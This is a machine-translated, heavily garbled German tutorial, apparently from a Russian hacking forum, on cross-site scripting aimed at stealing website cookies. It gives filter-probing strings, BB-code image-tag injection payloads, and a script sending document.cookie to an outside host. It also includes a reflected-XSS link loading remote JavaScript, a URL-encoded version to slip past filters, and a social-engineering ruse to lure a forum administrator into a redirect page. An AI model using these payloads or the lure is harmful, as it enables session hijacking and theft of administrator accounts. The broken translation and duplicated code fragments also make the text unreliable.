This page has been robot translated, sorry for typos if any. Original content here.

Beschreibung Xss von A bis Z.



  • Xss dieses Css => Cross Site Scripting
  • Wie verwenden XSS
  • Was ist XSS-Angriff?
  • Was ist passive und aktive XSS?
  • So lassen Sie sich spezifisch , wie in dieser Site XSS zu finden.
  • Und wie um zu bestimmen , gibt es einen Filter oder nicht?
  • aktiver XSS
  • Wir tun immer die Art von Codes
  • Als sein Stellvertreter mit Xss zu verknüpfen?


  • Xss dieses Css => Cross Site Scripting

    Nicht zu verwechseln mit dem CSS XSS auch nazvyayut
    Zum ersten Mal erschien dieser Fehler 1997.



    Wie XSS zu verwenden.


    Zuerst müssen wir das, was Plätzchen wissen.
    Wenn Sie wissen, können Sie überspringen.

    Cookie verwendet Anmeldeinformationen Website auf Besucher Computer zu speichern.
    Wenn Sie auf der Website unter dem Spitznamen ‚blabluble‘, dann ist die Website, die Sie auf Ihrem Computer-Datei registrieren, mit Cookies gespeichert haben, die Ihre Daten codiert sind.
    Und wenn Sie der Administrator sind und Sie haben Zugriff auf die Website, und ich - Benutzer, der von Ihnen gestohlen hat (der Administrator) Cookies, dann kann ich sicher gehen auf die Website, und die Seite, die ich identifiziert als ‚admin‘ - ich würde über Administratorrechte verfügen.

    So ändert (Substitution gestohlen) Cookies raten zu CookieEdit prog für IE oder integrierte Funktionen in Opera und Firefox kostenlos.

    Abfangen Cookies müssen Online einen Platz finden, wo Sie XSS-Angriff durchführen.


    Was ist XSS-Angriff?


    XSS-Angriffe - ist ein Angriff nicht auf der Website selbst, sondern auf den Nutzer der Website.
    XSS - es ist ein Defekt in der Filteranwendung.

    Es gibt passiven und aktiven XSS XSS.

    Was ist passive und aktive XSS?


    Passiv - diese Xss, die die direkte Beteiligung der Opfer erfordern + spezifische Einschränkungen und Komplexität hat.
    Daher wird passiver XSS nicht sehr geschätzt.
    Zum Beispiel müssen Sie sie auf eine giftige Verbindung zu holen, die Social-Engineering-Tricks erfordern.

    Aktiv - ist XSS, die auf Seiten des Opfers keine zusätzlichen Maßnahmen ergriffen werden müssen - es genügt, nur die Seite mit Ihren XSS und Java-Code zu öffnen automatisch ausgeführt wird.
    Dank der Automatisierung - sie sind sehr nützlich und wertvoll.
    Beispielsweise gibt es die aktive CSU in BB-Tags aufgrund unzureichender Filterung, wenn Sie eine Nachricht auf dem Forum \ Gästebuch \ Chat verlassen, die mit jedem Update immer aktiv sein werden.




    So lassen Sie sich spezifisch, wie in dieser Site XSS zu finden.


    Wie ich zuvor schrieb, dass XSS von Tags besteht, bestehen sie auch aus HTML und Sprache = javascript).

    Javascript kann html eingeben.
    Sie können codieren Filter umgehen. Aber dazu später mehr.

    Wie kann ich wissen, dass XSS vor Ort dan gehalten wird?
    Terrible rasprastrannonaya uzyavimost Typ
    <Script> alert () </ script> Wir versuchen , in allen verschiedenen Bereichen des Skripts einfügen ... , wenn Sie eine Nachricht mit dem Skript bedeutet links zu verarbeiten und zu erfüllen.

    Die meisten Proliferation XSS (nablyudaetsya an allen Orten, wo die Armen Filterung):

    „> <Script> alert () </ script>

    Der springende Punkt „>.

    Lassen Sie uns darüber nachdenken , was wir tun , wenn wir in das Feld „eingeben> <script> alert () </ script>, was passiert?

    Wir traten in der Form "> <script> alert () </ script> eine Variable prisvaivaetsya Feldwert. Eine Variable verarbeitet wird"> werden Durchführung, schließt

    Skript und vyprolnyaet <script> alert () </ script>

    Diese XSS ist die Verbreitung in Suchmaschinen finden:

    Überprüfen Sie alle von der Wiese und versuchen einfügen „> <script> alert () </ script>
    Wenn eine Nachricht hinterlassen - Sie haben XSS gefunden ...




    Und wie um zu bestimmen, gibt es einen Filter oder nicht?


    Geben Sie einfach in jedem Bereich: '' - „<########> = & {()}
    Öffnen Sie dann die HTML - Seite und suchen Sie nach dem Wort „########“
    und finden Sie in der folgenden charset Wert ..

    Wenn die <> und beließ es Pervan Zeichen der Verwundbarkeit - es bedeutet , dass der Filter ein Loch hat.
    Wenn „\ Zeichen so waren wie eingeführt wurden - dies ist das zweite Zeichen der Verwundbarkeit - Mögliche weitere Zeichen zu folgen-XSS - Angriff.
    Dann, wenn Sie den HTML - Code öffnen, haben Sie nicht <> höchstwahrscheinlich ein Loch im Filter gefunden.
    Wenn Sie den HTML - Code öffnen Sie feststellen , dass <> durch andere Zeichen ersetzt, es ist ein doofer - die Filter an
    Es funktioniert normal.
    Vielleicht sogar in das Feld geben Sie die Filter wie folgt zu überprüfen: „> <>‚‘‘, / \ @%?

    Betrachten wir den Fall , wenn der Filter isst <>

    In diesem Fall gibt es eine Möglichkeit, ein Loch.
    Zum Beispiel ist eine Filterbedingung ein <script> essen, <> und.
    Dann versuchen wir , <ZXCVB Skript: alert ();

    Der Filter sieht , dass es nichts Gefährliches in dem <IMG% 20SRC = „java script : alert (); nein, und damit schließt
    Ausführen des Skripts.

    Immer noch nicht sicher, ob die Filter nicht die andere Codierung filtern, können Sie versuchen, das Skript zu codieren und den Code einzufügen.

    Alle müssen durch Trial-and-error Suche, um zu versuchen ...
    Der Versuch, in die Felder und Ansicht zu gelangen, die wir aus dem Filter sorgfältig erhalten haben.
    tykov Methode zu verstehen, wie die Filter funktionieren, wenn er irgendwelche Fehler hat.
    Wenn die Filter schlecht sind, können wir immer Scripts einfügen.




    aktiver XSS


    Du hast genehmigt Tags verwenden und prekryvayas sie, ist es erforderlich, um die Anforderung abzuschließen.

    Zum Beispiel Tags url, bb, img.
    Der springende Punkt des Einsetzens ist, dass wir in einer Anfrage an die img oder URL parimetr aufbauen müssen. Wir haben eine Menge von Img parmetrov außer src und alt.
    Dieser Fehler wird sehr häufig im Forum, im Gästebuch verwendet ...

    Betrachten wir die aktive XSS.

    Achtung !!!

    Tags [* t fon], [im * g], [ur * l] * mit pishutsa für shtoby sie nicht mit dem Standortcode verschmolzen.
    Ispolzuvaniya entfernen diese Tags *.

    Zum Beispiel, ein Forum für die Anwesenheit der Verwendung von Tags sehen [* t fon], [im * g], [ur * l] und versuchen , sie in einem Skript zu setzen oder sie kombinieren.:

    [Im * g] HTTR: //www.qwewqw.ru/1.jpg [/ im * g] So Kreuz ... dann img verwendet , und wir holten ihn ab (nur eine Sache , die img enthalten ist, und Administratoren von der erstellen Sie eine Nachricht, die er entfernt wird, sagen sie nicht Bilder einbetten können, und es ist im Einsatz
    andere Form), wenn das Kreuz ist nicht ... und nur Zeichen hängen, dann versuchen Sie dies:
    [Im * g src = HTTR: //www.qwewqw.ru/1.jpg]

    Nun zum Beispiel, haben wir dieses Kreuz gemacht:
    [Im * g] HTTR: //www.qweqw.ru/1.jpg [/ im * g]

    Wir werden überprüfen, ob die Filter den Raum halten, fügen Sie ein Leerzeichen nach der Expansion jpg:
    [Im * g] HTTR: //www.qweqw.ru/1.jpg [/ im * g]
    wenn X - dann ist alles in Ordnung.

    Als nächstes gibt es die img Optionen und dynsrc lowsrc, die JavaScript halten. einfügen Zum Beispiel versuchen:
    [Im * g] http://www.qwewqw.ru/1.jpg dynsrc = java script: alert () [/ im * g]
    überprüfen, siehe - eine Meldung erhalten - dann gefunden XSS und aktiv jedes Skript einfügen können statt alert ().

    Wenn die Filter nicht übergeben wird, dies zu versuchen:
    [Im * g] http://www.qweqw.ru/ "/ dynsrc =" java script: alert () „/ 1.jpg [/ im * g]
    und
    [Im * g] http://www.qwewqw.ru/ „/ dynsrc = java script: alert () / 1.jpg [/ im * g]

    Wenn diese Beispiele das Kreuz gedreht, dann HTTR: //www.qweqw.ru/1.jpg die Adresse Sniffer ersetzen.

    Es gibt Fälle, in denen behinderten Administrator jpg.




    Wir tun immer die Typencodes:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg и так далие..
    Aber sie brachte keinen Nutzen, es ist nur für Bestätigungscodes (testirovki) auf Xss.

    Hier ist das Skript:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    Er stahl bereits die Cookies =)




    Als sein Stellvertreter mit Xss zu verknüpfen?


    Es ist sehr einfach zu ...
    Es gibt nur wenige einfache Optionen:

    - 1) wie folgt vorgehen:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> <script> img = new Bild (); img.src = "http://antichat.org/s/HakNet.gif" + Dokument http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> script> wo **** Website Xss.

    Hier ist er vom Skript zusammengestellt:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) Sie können wie diese viel mehr:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> script src = http :? //haknet.h16.ru/script/js.js> </ script> , die den http - Zugriffe: // haknet .h16.ru / script / js.js

    und js.js ist:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; = "http://antichat.org/s/HakNet.gif" + document.cookie; img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; Diese Methode ist zuverlässiger.

    Aber wie ich schon geschrieben habe - manchmal gibt es Schwierigkeiten mit den Filtern auf der Seite (keine Laminate, unser Skript).
    Dann müssen Sie darüber nachdenken, wie um es zu bekommen.
    Sie können nur etwas, etwas zu ändern, hinzufügen oder das Skript löschen.
    Aber es gibt eine zuverlässigere Option, wenn wir einfach ein Skript kodieren. Dazu gibt es eine Menge von prog.
    Es gibt so eine Website als http://ha.ckers.org/xss.html (Encoder-dekodirovschik).

    Hier ein Beispiel:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    es wurde kodiert:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Die Verschlüsselung ist insbesondere dann notwendig, nicht nur die Filter zu täuschen, aber für den Betrug bei der Verwendung von PASSIVE ADMIN CSU.

    Hier ist ein Beispiel, basierend auf Social Engineering.
    Wir suchen den Kontakt mit dem Admin-Forum es im Forum Link auf Ihrer Website werfen, und gebe govorish so „cooles Feature ist auf der Website“ und so dale im gleichen Geist.
    Und unsere Seite Sie ahnen es =) UTB ist das Skript:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    Was macht document.location.href Sie mich fragen? ..)) ein Java-Code ist, die von einer bestimmten Website Cho so gut ohne Anforderung geht wir bekommen, wir den Link zum Administrator geben, und er kam zu unserer Seite, hier ist, was es zu tun .. schnell wirft

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E % 2A% 2A% 2A% 2A% 2E% %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E und es ist unsere bereits Xss in verschlüsselter Form.

    Hinweis: Dies kann nur funktionieren, wenn Xss zur Admin-Seite gehört, die Sie auf den Link warfen ...
    Mit anderen Worten DIFFICULTY PASSIVE CSU ist, dass die Verwundbarkeit nur verwendet werden, wenn das Opfer in die betroffene Site angemeldet ist !!!